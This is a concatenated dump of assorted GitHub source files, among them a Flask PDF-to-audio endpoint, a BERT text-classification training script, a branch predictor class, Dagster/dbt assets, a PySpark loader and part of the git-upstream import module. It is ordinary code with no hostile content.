'OPTIONS':\n return _build_cors_preflight_response()\n\n elif request.method == 'POST':\n\n\n try:\n\n\n\n\n\n username, token = request.json['username'], request.json['token']\n\n\n\n\n\n is_registered = UserRegisterDB.validateToken(username, token)\n if not is_registered:\n\n return {\"TokenNotFound\":token}\n\n fPath = \"tmp_files/\"+randomStringHash(10)+\".wav\"\n\n\n\n pdfObj = PyPDF2.PdfFileReader(io.BytesIO(base64.b64decode(request.json['data'])))\n\n #Facade\n\n pdf2wavServerobj = pdf2wavServer(\"pdf\", \"wav\", \"bytes\", pdfObj,RedisCache(\"127.0.0.1:6379\"),fPath)\n\n response = pdf2wavServerobj.executePdfToWav()\n\n return response\n except Exception as e:\n print (e)\n return jsonify(e)\n else:\n return jsonify(\"server only allows POST\")\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"adiraokhoury/pdf2wav","sub_path":"server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71872172649","text":"################################################################################\n# Segmentation algo. 
demo #\n# ============================================================================ #\n# export KEY=$(cat ~/.algorithmia/config \\ #\n# |grep api_key |awk '{print $3}' |sed 's/\"//g') #\n# export SERVER=$(cat ~/.algorithmia/config \\ #\n# |grep api_server |awk '{print $3}' |sed 's/\"//g') #\n# python3 example.py $KEY $SERVER test_images \"data://.my/test_images\" \\ #\n# \"data://.algo/nocturne/segment/temp\" result #\n# #\n# Phil Stubbings, ONS Data Science Campus. #\n################################################################################\n\nALGO=\"nocturne/segment/1397637817d54197cbe1d35a4eeb3c7fddc0f34a\"\n\nimport Algorithmia\nimport sys\nfrom algo_io import AlgoIO\napi_key, api_endpoint, local_src_dir, remote_src_dir, remote_dst_dir, \\\n local_dst_dir = sys.argv[1:]\n\nalgo_io = AlgoIO(api_key, api_endpoint)\nalgo_client = Algorithmia.client(api_key, api_endpoint)\n\n# 1. upload contents of local_src_dir to algorithmia data:// location.\nprint(\"uploading images...\")\nalgo_io.upload_dir(local_src_dir+\"/*\", remote_src_dir)\n\n# 2. invoke algo.\nprint(\"start image segmentation...\")\nalgo = algo_client.algo(ALGO).set_options(timeout=600, stdout=True)\nresult = algo.pipe(dict(src=remote_src_dir, dst=remote_dst_dir))\n\nprint(result.result)\nprint(result.metadata)\n\n# 3. stash results locally.\nprint(\"downloading results...\")\nalgo_io.download_dir(remote_dst_dir, local_dst_dir)\n\nprint(\"done.\")\n","repo_name":"datasciencecampus/algorithmia-segment","sub_path":"src/client/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13516694449","text":"import json\nfrom datetime import datetime\n\nfrom asgiref.sync import async_to_sync\nfrom channels.layers import get_channel_layer\nfrom django.core.serializers.json import DjangoJSONEncoder\nfrom django.forms.models import model_to_dict\n\nfrom .models import Performance, Venue\nfrom .serializers import PerformanceSerializerPlain\n\n\ndef broadcast_status():\n\n async_to_sync(get_channel_layer().group_send)(\n \"dashboard\",\n {\n \"type\": \"dashboard_message\",\n \"data\": json.dumps(build_dict(), cls=DjangoJSONEncoder),\n },\n )\n\n\ndef build_dict():\n data = {\"venues\": {}, \"global_time\": datetime.now()}\n for v in Venue.objects.all():\n performances = Performance.objects.filter(venue=v.id).order_by(\"planned_start\")\n serializer = PerformanceSerializerPlain(performances, many=True)\n # we have another time per event, calculated by the event model.\n data[\"venues\"][str(v.id)] = {\n \"venue\": model_to_dict(v),\n \"talks\": serializer.data,\n \"time\": v.event.current_time,\n }\n\n return data\n","repo_name":"Jugendhackt/fahrplanplusplus","sub_path":"production_control/broadcast.py","file_name":"broadcast.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11413883835","text":"#Estructuras de computadoras 2\n#Jesus Zuñiga Mendez\n#B59084\n#Tarea # 1 Branch predictor\n#Escuela de ING ELECTRICA I Ciclo 2023 UCR\n\n\n#Predictor propuesto JZM2023\n#Explicacion del predictor\n #Sabemos que los saltos por lo general no se toman frecuentemente o se toman muy frecuentemente, \n #como por ejemplo en los bucles donde solo una vez de la n cantidad de veces que se hace el bucle \n #no toma el salto, además en el TRACER de ejmplo las direcciones del pc son decimales pero si se \n #convierten 
a binario se daran cuenta que son direcciones de 22 bits, por lo que este predictor\n #guarda en una tabla que se indexa segun los 12 ultimos bits de la palabra del pc si el salto\n #anterior se tomó o no y en otra tabla que indexa segun los 7 primeros bits de la palabra si se \n #tomo el salto o no con esto se logra abarcar la mayporia de bits de la palabra con el fin \n #de hacer un registro de pesos en el que se defina entre ambas tablas si el salto debe o no\n #ser tomado\nclass ie0521_bp:\n def __init__(self):\n self.auxiliar=0\n #Variables que ayudan a estimar el presupuesto utilizado\n self.presupuestoOtorgado = 65536\n self.presupuestoGastado = 0\n self.presupuestoSobrante = 0\n #variables que hardcodean el tamaño del predictor\n self.maxTamanioPC = 14 #Tamanio maximo de la palabra que se recibe en el pc, editar de ser necesario\n self.maxTamanioHistoria = 4 #Tamaño del forro del empaquetado\n #se calcula el tamanio de la tabla y se crea\n #|_____|Hisotria |\n #|PC_i |HisotriaPC_i|\n #| : : |\n #| : : |\n #|PC_n |HisotriaPC_n|\n self.tamanioTablas = 2**self.maxTamanioPC #cantidad de registros que se pueden almacenar en la tabla\n self.vectorHistoria = [0 for i in range(self.maxTamanioHistoria)]\n self.laTabla = [self.vectorHistoria for i in range(self.tamanioTablas)]\n #se calcula el presupuesgto\n self.presupuestoGastado = self.presupuestoGastado + (self.maxTamanioHistoria * self.tamanioTablas)\n self.presupuestoSobrante = self.presupuestoOtorgado - self.presupuestoGastado\n #Variables necesarias para devolver el resultado del predicto\n self.total_predictions = 0\n self.total_taken_pred_taken = 0\n self.total_taken_pred_not_taken = 0\n self.total_not_taken_pred_taken = 0\n self.total_not_taken_pred_not_taken = 0\n ###########\n def print_info(self):\n print(\"Parámetros del predictor:\")\n print(\"\\tTipo de predictor:\\t\\t\\tJZMFilter2023BP\")\n print(\"\\tBits del PC para indexar:\\t\\t\\t\"+str(self.maxTamanioPC))\n print(\"\\tTamaño de los registros de historia global:\\t\"+str(self.maxTamanioHistoria))\n print(\"Informacion sobre presupuesto: \")\n self.printPresupuesto()\n ######### \n def print_stats(self):\n print(\"Resultados de la simulación\")\n print(\"\\t# branches:\\t\\t\\t\\t\\t\\t\"+str(self.total_predictions))\n print(\"\\t# branches tomados predichos correctamente:\\t\\t\"+str(self.total_taken_pred_taken))\n print(\"\\t# branches tomados predichos incorrectamente:\\t\\t\"+str(self.total_taken_pred_not_taken))\n print(\"\\t# branches no tomados predichos correctamente:\\t\\t\"+str(self.total_not_taken_pred_not_taken))\n print(\"\\t# branches no tomados predichos incorrectamente:\\t\"+str(self.total_not_taken_pred_taken))\n perc_correct = 100*(self.total_taken_pred_taken+self.total_not_taken_pred_not_taken)/self.total_predictions\n formatted_perc = \"{:.3f}\".format(perc_correct)\n print(\"\\t% predicciones correctas:\\t\\t\\t\\t\"+str(formatted_perc)+\"%\")\n ##########\n def predict(self, PC):\n #se calcula el tamanio de la pc evaluada para ajustarla al maxTamanioPalabra\n indexPC = int(PC) % self.tamanioTablas\n ##se dezplaza el registro de historia actualizando segun el resultado\n historiaPC = self.laTabla[indexPC]\n copiaHistoria= historiaPC.copy()\n prediccion = \"N\"\n rve = 5\n for i in range(len(copiaHistoria)):\n if i == 0:\n rve = copiaHistoria[i] + copiaHistoria[i+1]\n elif i > 1:\n rve = rve + copiaHistoria[i]\n\n if rve == 0:\n tamanioVector = len(copiaHistoria)\n final = tamanioVector - 1\n if (copiaHistoria[final] == -1) and 
(copiaHistoria[final-1] == -1):\n prediccion = \"N\"\n elif(copiaHistoria[final] == 1) and (copiaHistoria[final-1] == -1):\n prediccion = \"N\"\n elif(copiaHistoria[final] == -1) and (copiaHistoria[final-1] == 1):\n prediccion = \"T\"\n elif(copiaHistoria[final] == 1) and (copiaHistoria[final-1] == 1):\n prediccion = \"T\"\n else:\n prediccion = \"N\"\n elif rve > 0:\n prediccion = \"T\"\n else:\n prediccion = \"N\"\n return prediccion\n ##########\n def update(self, PC, result, prediction):\n #se calcula el tamanio de la pc evaluada para ajustarla al maxTamanioPalabra\n indexPC = int(PC) % self.tamanioTablas\n ##se dezplaza el registro de historia actualizando segun el resultado\n historiaPC = self.laTabla[indexPC]\n copiaHistoria= historiaPC.copy()\n bitGuardar = 0\n if result == \"T\":\n bitGuardar = 1\n if result == \"N\":\n bitGuardar = -1\n for i in range(len(copiaHistoria)):\n if i < (len(copiaHistoria) - 1):\n copiaHistoria[i] = copiaHistoria[i+1]\n else:\n copiaHistoria[i] = bitGuardar\n self.laTabla[indexPC] = copiaHistoria\n #Update stats\n if result == \"T\" and result == prediction:\n self.total_taken_pred_taken += 1\n elif result == \"T\" and result != prediction:\n self.total_taken_pred_not_taken += 1\n elif result == \"N\" and result == prediction:\n self.total_not_taken_pred_not_taken += 1\n else:\n self.total_not_taken_pred_taken += 1\n self.total_predictions += 1\n\n #metodo auxiliar para ver el contenido de la historia en un index de la tabla\n def printTabla(self,index):\n print(\"imprimiendo la Historia en el indice \"+str(index))\n print(self.laTabla[index])\n #metodo auxiliar para ver el presupuesto estimado\n def printPresupuesto(self):\n print(\"Otorgado: \",end=\"\")\n print(self.presupuestoOtorgado,end=\" \")\n print(\"Gastado: \",end=\"\")\n print(self.presupuestoGastado,end=\" \")\n print(\"Sobrante: \",end=\"\")\n print(self.presupuestoSobrante,end=\"\\n\")\n #preuab grafica de pesos \n def pruebaPesos(self):\n lista = [\n [-1,-1,-1],\n [-1,-1,1],\n [-1,1,-1],\n [-1,1,1],\n [1,-1,-1],\n [1,-1,1],\n [1,1,-1],\n [1,1,1]]\n rve = 5\n for ii in range(len(lista)):\n vactor = lista[ii]\n for i in range(len(vactor)):\n if i == 0:\n rve = vactor[i] + vactor[i+1]\n elif i > 1:\n rve = rve + vactor[i]\n print (vactor, end=' ')\n print (rve, end='\\n')\n exit()\n\n\n","repo_name":"Jesus-Zuniga-Mendez/Backup_Proyects","sub_path":"Python/JesusZuñigaTarea1B59084/Modelo de un predictor de saltos/ie0521_bp.py","file_name":"ie0521_bp.py","file_ext":"py","file_size_in_byte":7376,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24776308189","text":"from django.urls import path\n\nfrom album.views import (\n CreateAlbumView,\n PublicAlbumListView,\n PublicAlbumDetailView,\n)\n\napp_name = 'album'\n\nurlpatterns = [\n path('new/', CreateAlbumView.as_view(), name='new'),\n path('', PublicAlbumListView.as_view(), name='index'),\n path('detail//', PublicAlbumDetailView.as_view(), name='detail'),\n]\n","repo_name":"mentix02/lottery","sub_path":"album/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18183909052","text":"import json\nimport glob\nimport pickle as pkl\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.io\nfrom sklearn import svm, tree\nfrom sklearn.metrics import precision_recall_fscore_support\nfrom sklearn.preprocessing import normalize, scale\nfrom 
scipy.cluster.vq import whiten\nfrom sklearn.manifold import TSNE\n\nfrom transformers import BertTokenizer, BertForSequenceClassification, BertConfig\nfrom transformers.optimization import AdamW, get_linear_schedule_with_warmup\nimport torch\nimport math\nimport time\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\n\nfrom sklearn.model_selection import StratifiedKFold\n\n\ndef get_optimizers(model, learning_rate, adam_epsilon, weight_decay, num_training_steps):\n # Prepare optimizer and schedule (linear warmup and decay)\n no_decay = [\"bias\", \"LayerNorm.weight\"]\n optimizer_grouped_parameters = [\n {\"params\": [p for n, p in model.named_parameters() if not any(nd in n for nd in no_decay)],\n \"weight_decay\": weight_decay},\n {\"params\": [p for n, p in model.named_parameters() if any(nd in n for nd in no_decay)],\n \"weight_decay\": 0.0},\n ]\n optimizer = AdamW(optimizer_grouped_parameters, lr=learning_rate, eps=adam_epsilon)\n\n scheduler = get_linear_schedule_with_warmup(optimizer, num_warmup_steps=0,\n num_training_steps=num_training_steps)\n return optimizer, scheduler\n\ndef train_and_test():\n # prepare data\n fileNameList = glob.glob('C:/YYQ/PGproject/PreProcessing/processed_features_facenet/*.pkl')\n # print(fileNameList)\n # basic features\n # text-list and tf-idf\n text_list = []\n labels = []\n visual_features = []\n audio_features = []\n for file_name in fileNameList:\n data_point = pkl.load(open(file_name, 'rb'))\n clip_name, label, transcription, smoothed_seq = data_point[0], data_point[1], data_point[2], data_point[3]\n # print(label, transcription)\n # continue\n labels.append(label)\n text_list.append(transcription)\n # average visual features\n # visual_seq = np.stack([w['landmark_feature'] for w in smoothed_seq], axis=0)\n visual_seq = np.stack([w['facenet_feature'].squeeze() for w in smoothed_seq], axis=0)\n # visual_seq = scale(visual_seq)\n # visual_seq = visual_seq - np.mean(visual_seq, axis=0)\n # print(visual_seq.shape)\n # visual_mean = np.mean(visual_seq, axis=0)\n visual_features.append(visual_seq)\n # average audio features\n audio_seq = np.stack([w['audio_grp'] for w in smoothed_seq], axis=0)\n # audio_seq = scale(audio_seq)\n # print(audio_seq.shape)\n # audio_mean = np.mean(audio_seq, axis=0)\n audio_features.append(audio_seq)\n\n # exit()\n print(text_list)\n lens = [len(a.split()) for a in text_list]\n print(min(lens), max(lens))\n exit()\n\n tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')\n pg = tokenizer.batch_encode_plus(text_list, max_length=128, pad_to_max_length=True)\n '''print(len(pg))\n for k in pg.keys():\n print(k, len(pg[k]), [len(kk) for kk in pg[k]])'''\n\n x = pg['input_ids']\n token_type_ids = pg['token_type_ids']\n attention_mask = pg['attention_mask']\n '''for xx in x:\n print(xx)'''\n\n x, token_type_ids, attention_mask = np.array(x), np.array(token_type_ids), np.array(attention_mask)\n labels = np.array(labels)\n\n skf = StratifiedKFold(n_splits=5)\n cv5_ids = list(skf.split(x, labels))\n\n sp = cv5_ids[0]\n train_l, train_labels = x[sp[0]], labels[sp[0]]\n # train_data, train_labels = sm.fit_sample(train_data, train_labels)\n test_l, test_labels = x[sp[1]], labels[sp[1]]\n print(train_l.shape)\n\n train_token_type_ids, test_token_type_ids, train_attention_mask, test_attention_mask = token_type_ids[sp[0]], \\\n token_type_ids[sp[1]], attention_mask[sp[0]], attention_mask[sp[1]]\n\n # shuffle training data for batch reading\n n_train = len(train_l)\n n_eval = 
len(test_l)\n perm = np.random.permutation(n_train)\n train_l = train_l[perm]\n train_labels = np.array(train_labels)[perm]\n train_token_type_ids, train_attention_mask = train_token_type_ids[perm], train_attention_mask[perm]\n\n train_l, test_l, train_labels, test_labels, train_token_type_ids, test_token_type_ids = torch.LongTensor(train_l), \\\n torch.LongTensor(test_l), \\\n torch.LongTensor(train_labels), \\\n torch.LongTensor(test_labels), \\\n torch.LongTensor(train_token_type_ids), \\\n torch.LongTensor(test_token_type_ids)\n\n train_attention_mask, test_attention_mask = torch.FloatTensor(train_attention_mask), \\\n torch.FloatTensor(test_attention_mask)\n\n # model = BertForSequenceClassification.from_pretrained('bert-base-uncased', num_labels=3).to('cuda')\n config = BertConfig.from_pretrained('bert-base-uncased', num_labels=3)\n model = BertForSequenceClassification(config).to('cuda')\n # print(model(train_l[:32], token_type_ids=train_token_type_ids[:32], attention_mask=train_attention_mask[:32], labels=train_labels[:32])[1])\n\n eval_every = 5\n batch_size = 32\n test_batch_size = 8\n max_epochs = 500\n t_total = math.ceil(n_train / batch_size) * max_epochs\n lr = 2e-5\n epsilon = 1e-8\n max_grad_norm = 1.0\n weight_decay = 0.0\n\n optimizer, scheduler = get_optimizers(model, learning_rate=lr, adam_epsilon=epsilon, weight_decay=weight_decay,\n num_training_steps=t_total)\n\n # loss_fn = torch.nn.CrossEntropyLoss().cuda()\n model.train()\n model.zero_grad()\n\n for ep in range(max_epochs):\n idx = 0\n avg_loss = 0\n n_batch = 0\n model.train()\n while idx < n_train:\n optimizer.zero_grad()\n batch_l = train_l[idx:(idx + batch_size)].to('cuda')\n batch_ty = train_token_type_ids[idx:(idx + batch_size)].to('cuda')\n batch_am = train_attention_mask[idx:(idx + batch_size)].to('cuda')\n ans = train_labels[idx:(idx + batch_size)].to('cuda')\n idx += batch_size\n preds = model(input_ids=batch_l, token_type_ids=batch_ty, attention_mask=batch_am, labels=ans)\n loss = preds[0]\n # print(preds, ans)\n loss.backward()\n # print(loss.data.cpu().numpy())\n avg_loss += loss.data.cpu().numpy()\n n_batch += 1.\n\n torch.nn.utils.clip_grad_norm_(model.parameters(), max_grad_norm)\n optimizer.step()\n scheduler.step()\n model.zero_grad()\n\n avg_loss = avg_loss / n_batch\n print(\"epoch: %d avg_loss: %f\" % (ep + 1, avg_loss))\n\n del batch_l, batch_ty, batch_am\n torch.cuda.empty_cache()\n # time.sleep(20)\n\n if ep % eval_every == 0:\n idx = 0\n model.eval()\n eval_preds = np.array([])\n while idx < n_eval:\n test_batch_l = test_l[idx:(idx + test_batch_size)].to('cuda')\n test_batch_ty = test_token_type_ids[idx:(idx + test_batch_size)].to('cuda')\n test_batch_am = test_attention_mask[idx:(idx + test_batch_size)].to('cuda')\n test_ans = test_labels[idx:(idx + test_batch_size)].to('cuda')\n # time.sleep(20)\n # exit()\n test_pred = model(input_ids=test_batch_l,\n token_type_ids=test_batch_ty,\n attention_mask=test_batch_am,\n labels=test_ans)\n scores = test_pred[1]\n _, batch_eval_preds = scores.data.cpu().max(1)\n eval_preds = np.concatenate((eval_preds, batch_eval_preds), axis=-1)\n idx += test_batch_size\n # metrics\n precison, recall, fscore, support = precision_recall_fscore_support(test_labels.cpu().numpy(), eval_preds,\n labels=[0, 1, 2], average=None)\n\n '''scores = model(train_data, train_lens)\n _, train_preds = scores.data.cpu().max(1)\n print(\"training set: %f\" % (float(sum(train_preds.numpy() == train_labels.cpu().numpy())) / len(train_preds.numpy())))\n 
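For reference, a self-contained sketch (toy labels, not this experiment's outputs) of the precision_recall_fscore_support call used in the evaluation branch above; average=None returns per-class arrays:

import numpy as np
from sklearn.metrics import precision_recall_fscore_support

y_true = np.array([0, 1, 2, 1, 0])
y_pred = np.array([0, 2, 2, 1, 0])
# One precision/recall/F-score/support entry per class label.
precision, recall, fscore, support = precision_recall_fscore_support(
    y_true, y_pred, labels=[0, 1, 2], average=None
)
print(precision, recall, fscore, support)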
print(eval_preds.numpy())'''\n print(float(sum(eval_preds == test_labels.cpu().numpy())) / len(eval_preds))\n print(precison, recall, fscore, support)\n\n\nif __name__ == \"__main__\":\n train_and_test()\n\n","repo_name":"FlamingHorizon/MORSE","sub_path":"transformer_textual.py","file_name":"transformer_textual.py","file_ext":"py","file_size_in_byte":8993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9880295957","text":"# ruff: noqa: I001\n# start_imports\nimport os\n\nimport duckdb\nimport pandas as pd\nimport plotly.express as px\nfrom dagster import MetadataValue, AssetExecutionContext, asset\nfrom dagster_dbt import DbtCliResource, dbt_assets, get_asset_key_for_model\n\nfrom .constants import dbt_manifest_path, dbt_project_dir\n\n# end_imports\n\nduckdb_database_path = dbt_project_dir.joinpath(\"tutorial.duckdb\")\n\n\n@asset(compute_kind=\"python\")\ndef raw_customers(context: AssetExecutionContext) -> None:\n data = pd.read_csv(\"https://docs.dagster.io/assets/customers.csv\")\n connection = duckdb.connect(os.fspath(duckdb_database_path))\n connection.execute(\"create schema if not exists jaffle_shop\")\n connection.execute(\n \"create or replace table jaffle_shop.raw_customers as select * from data\"\n )\n\n # Log some metadata about the table we just wrote. It will show up in the UI.\n context.add_output_metadata({\"num_rows\": data.shape[0]})\n\n\n@dbt_assets(manifest=dbt_manifest_path)\ndef jaffle_shop_dbt_assets(context: AssetExecutionContext, dbt: DbtCliResource):\n yield from dbt.cli([\"build\"], context=context).stream()\n\n\n# start_downstream_asset\n@asset(\n compute_kind=\"python\",\n deps=get_asset_key_for_model([jaffle_shop_dbt_assets], \"customers\"),\n)\ndef order_count_chart(context: AssetExecutionContext):\n # read the contents of the customers table into a Pandas DataFrame\n connection = duckdb.connect(os.fspath(duckdb_database_path))\n customers = connection.sql(\"select * from customers\").df()\n\n # create a plot of number of orders by customer and write it out to an HTML file\n fig = px.histogram(customers, x=\"number_of_orders\")\n fig.update_layout(bargap=0.2)\n save_chart_path = duckdb_database_path.parent.joinpath(\"order_count_chart.html\")\n fig.write_html(save_chart_path, auto_open=True)\n\n # tell Dagster about the location of the HTML file,\n # so it's easy to access from the Dagster UI\n context.add_output_metadata(\n {\"plot_url\": MetadataValue.url(\"file://\" + os.fspath(save_chart_path))}\n )\n\n\n# end_downstream_asset\n","repo_name":"dagster-io/dagster","sub_path":"examples/docs_snippets/docs_snippets/integrations/dbt/tutorial/downstream_assets/assets.py","file_name":"assets.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"23979497975","text":"## 2. Defining the Dataset Class ##\n\nclass Dataset:\n def __init__(self):\n self.type = 'csv'\n \ndataset = Dataset()\nprint(dataset.type)\n\n## 3. Passing Additional Arguments to the Initializer ##\n\n# Default display code\nclass Dataset:\n def __init__(self, data):\n self.data = data\n \nnfl_data_file = open('nfl.csv', 'r')\ncsvreader = csv.reader(nfl_data_file)\nnfl_data = list(csvreader)\ndataset = Dataset(nfl_data)\ndataset_data = dataset.data\n\n## 4. 
Adding Additional Behavior ##\n\n# Default display code\nclass Dataset:\n def __init__(self, data):\n self.data = data\n def print_data(self, num_rows):\n print(self.data[:num_rows])\n\ndataset = Dataset(nfl_data)\nnfl_dataset = dataset.data\ndataset.print_data(5) \n\n## 5. Enhancing the Initializer ##\n\n# Default display code\nclass Dataset:\n def __init__(self, data):\n self.data = data\n def extract_header(self):\n self.header = self.data[0]\n self.data = self.data[1:]\n\nnfl_dataset = Dataset(nfl_data)\nnfl_dataset.extract_header()\nnfl_header = nfl_dataset.header\n\n## 6. Grabbing Column Data ##\n\n# Default display code\nclass Dataset:\n def __init__(self, data):\n self.header = data[0]\n self.data = data[1:]\n \n # Add your method here.\n def column(self, label):\n if label not in self.header:\n return None\n index = 0\n for idx, element in enumerate(self.header):\n if label == element:\n index = idx\n column = []\n for row in self.data:\n column.append(row[index])\n return column\n \n\nnfl_dataset = Dataset(nfl_data)\nyear_column = nfl_dataset.column('year')\nplayer_column = nfl_dataset.column('player')\n\n## 7. Count Unique Method ##\n\n# Default display code\nclass Dataset:\n def __init__(self, data):\n self.header = data[0]\n self.data = data[1:]\n \n def column(self, label):\n if label not in self.header:\n return None\n \n index = 0\n for idx, element in enumerate(self.header):\n if label == element:\n index = idx\n \n column = []\n for row in self.data:\n column.append(row[index])\n return column\n \n def count_unique(self, label):\n return len(set(self.column(label)))\n\nnfl_dataset = Dataset(nfl_data)\ntotal_years = nfl_dataset.count_unique('year')\n\n## 8. Make Objects Human Readable ##\n\n# Default display code\nclass Dataset:\n def __init__(self, data):\n self.header = data[0]\n self.data = data[1:]\n \n # Add the special method here\n \n def column(self, label):\n if label not in self.header:\n return None\n \n index = 0\n for idx, element in enumerate(self.header):\n if label == element:\n index = idx\n \n column = []\n for row in self.data:\n column.append(row[index])\n return column\n \n \n def count_unique(self, label):\n unique_results = set(self.column(label))\n count = len(unique_results)\n return count\n \n def __str__(self):\n return str(self.data[:10])\n\nnfl_dataset = Dataset(nfl_data)\nprint(nfl_dataset)","repo_name":"atharvalele/dataquest-code","sub_path":"python-programming-intermediate/Classes-259.py","file_name":"Classes-259.py","file_ext":"py","file_size_in_byte":3241,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"9188777658","text":"from collections import defaultdict\nclass Solution:\n def equalPairs(self, grid: List[List[int]]) -> int: \n count = 0\n CountRow = defaultdict(int)\n for row in grid:\n CountRow[tuple(row)] += 1\n for col in zip(*grid):\n count += CountRow[col]\n return count","repo_name":"Suratan63011017/LeetCode","sub_path":"2352.py","file_name":"2352.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13271759189","text":"from pyspark.sql.types import StructType\n\ndef extract_data(session):\n\n #Define the schema before importing data from Hadoop. 
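The equalPairs solution above hinges on zip(*grid) iterating over the columns of a row-major grid; a small worked example (values chosen so exactly one row/column pair matches):

from collections import defaultdict

grid = [[3, 2, 1],
        [1, 7, 6],
        [2, 7, 7]]
row_counts = defaultdict(int)
for row in grid:
    row_counts[tuple(row)] += 1
# zip(*grid) yields the columns as tuples: (3, 1, 2), (2, 7, 7), (1, 6, 7);
# row (2, 7, 7) equals the middle column, so the total is 1.
print(sum(row_counts[col] for col in zip(*grid)))  # prints 1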
Schema contains name of each column and data type.\n dataSchema = StructType().add(\"title\", \"string\").add(\"rank\", \"integer\").add(\"date\", \"string\").add(\"artist\", \"string\").add(\"url\", \"string\").add(\"region\", \"string\").add(\"chart\", \"string\").add(\"trend\", \"string\").add(\"streams\", \"integer\")\n\n # -- Reading Raw Data -- \n\n # -- Reading Raw Data -- \n\n #Read CSV file from HDFS running on localhost using the previously defined schema. `header` indicates that the file contains a header row which should be omitted before reading.\n data = session.read.csv(\"hdfs://localhost:9000/user/input/charts.csv\", schema=dataSchema, header=True)\n\n #Create a temporary local table view of the DataFrame with name as `charts_data`. We can now run SQL queries on this table.\n data.createOrReplaceTempView(\"charts_data\")\n\n # Top200 chart has the most number of entries so we're only interested in that entries with chart=top200.\n # We are only interested in the columns title, rank, date, artist, region, and streams so we will select only those columns.\n result = session.sql(\"SELECT title, rank, date, SUBSTRING_INDEX(artist, ',', 1) AS artist, region, streams FROM charts_data WHERE chart='top200'\")\n \n session.catalog.dropTempView('charts_data') #Dropping the temp table as we no longer need it.\n\n return result\n\nif __name__==\"__main__\":\n extract_data()\n","repo_name":"dhanush-bhargav/dats6102-project","sub_path":"code/extract_data.py","file_name":"extract_data.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19679314981","text":"from git_upstream.errors import GitUpstreamError\nfrom git_upstream.log import LogDedentMixin\nfrom git_upstream.lib.utils import GitMixin\nfrom git_upstream.lib.rebaseeditor import RebaseEditor\nfrom git_upstream import subcommand, log\nfrom git_upstream.lib.searchers import UpstreamMergeBaseSearcher\n\nfrom abc import ABCMeta, abstractmethod\nfrom collections import Sequence\nfrom git import GitCommandError\n\nimport inspect\n\n\nclass ImportUpstreamError(GitUpstreamError):\n \"\"\"Exception thrown by L{ImportUpstream}\"\"\"\n pass\n\n\nclass ImportUpstream(LogDedentMixin, GitMixin):\n \"\"\"\n Import code from an upstream project and merge in additional branches\n to create a new branch unto which changes that are not upstream but are\n on the local branch are applied.\n \"\"\"\n\n def __init__(self, branch=None, upstream=None, import_branch=None,\n extra_branches=None, *args, **kwargs):\n if not extra_branches:\n extra_branches = []\n self._branch = branch\n self._upstream = upstream\n self._import_branch = import_branch\n self._extra_branches = extra_branches\n\n # make sure to correctly initialise inherited objects before performing\n # any computation\n super(ImportUpstream, self).__init__(*args, **kwargs)\n\n # test that we can use this git repo\n if not self.is_detached():\n raise ImportUpstreamError(\"In 'detached HEAD' state\")\n\n if self.repo.bare:\n raise ImportUpstreamError(\"Cannot perform imports in bare repos\")\n\n if self.branch == 'HEAD':\n self._branch = str(self.repo.active_branch)\n\n # validate branches exist and log all failures\n branches = [\n self.branch,\n self.upstream\n ]\n branches.extend(self.extra_branches)\n\n invalid_ref = False\n for branch in branches:\n if not any(head for head in self.repo.heads\n if head.name == branch):\n msg = \"Specified ref does not exist: '%s'\"\n self.log.error(msg, 
branch)\n invalid_ref = True\n\n if invalid_ref:\n raise ImportUpstreamError(\"Invalid ref\")\n\n @property\n def branch(self):\n \"\"\"Branch to search for branch changes to apply when importing.\"\"\"\n return self._branch\n\n @property\n def upstream(self):\n \"\"\"Branch containing the upstream project code base to track.\"\"\"\n return self._upstream\n\n @property\n def import_branch(self):\n \"\"\"\n Pattern to use to generate the name, or user specified branch name\n to use for import.\n \"\"\"\n return self._import_branch\n\n @property\n def extra_branches(self):\n \"\"\"\n Branch containing the additional branches to be merged with the\n upstream when importing.\n \"\"\"\n return self._extra_branches\n\n def _set_branch(self, branch, commit, checkout=False, force=False):\n\n if str(self.repo.active_branch) == branch:\n self.log.info(\n \"\"\"\\\n Resetting branch '%s' to specified commit '%s'\n git reset --hard %s\n \"\"\", branch, commit, commit)\n self.git.reset(commit, hard=True)\n elif checkout:\n if force:\n checkout_opt = '-B'\n else:\n checkout_opt = '-b'\n\n self.log.info(\n \"\"\"\\\n Checking out branch '%s' using specified commit '%s'\n git checkout %s %s %s\n \"\"\", branch, commit, checkout_opt, branch, commit)\n self.git.checkout(checkout_opt, branch, commit)\n else:\n self.log.info(\n \"\"\"\\\n Creating branch '%s' from specified commit '%s'\n git branch --force %s %s\n \"\"\", branch, commit, branch, commit)\n self.git.branch(branch, commit, force=force)\n\n def create_import(self, commit=None, import_branch=None, checkout=False,\n force=False):\n \"\"\"\n Create the import branch from the specified commit.\n\n If the branch already exists abort if force is false\n If current branch, reset the head to the specified commit\n If checkout is true, switch and reset the branch to the commit\n Otherwise just reset the branch to the specified commit\n If the branch doesn't exist, create it and switch to it\n automatically if checkout is true.\n \"\"\"\n\n if not commit:\n commit = self.upstream\n\n try:\n self.git.show_ref(commit, quiet=True, 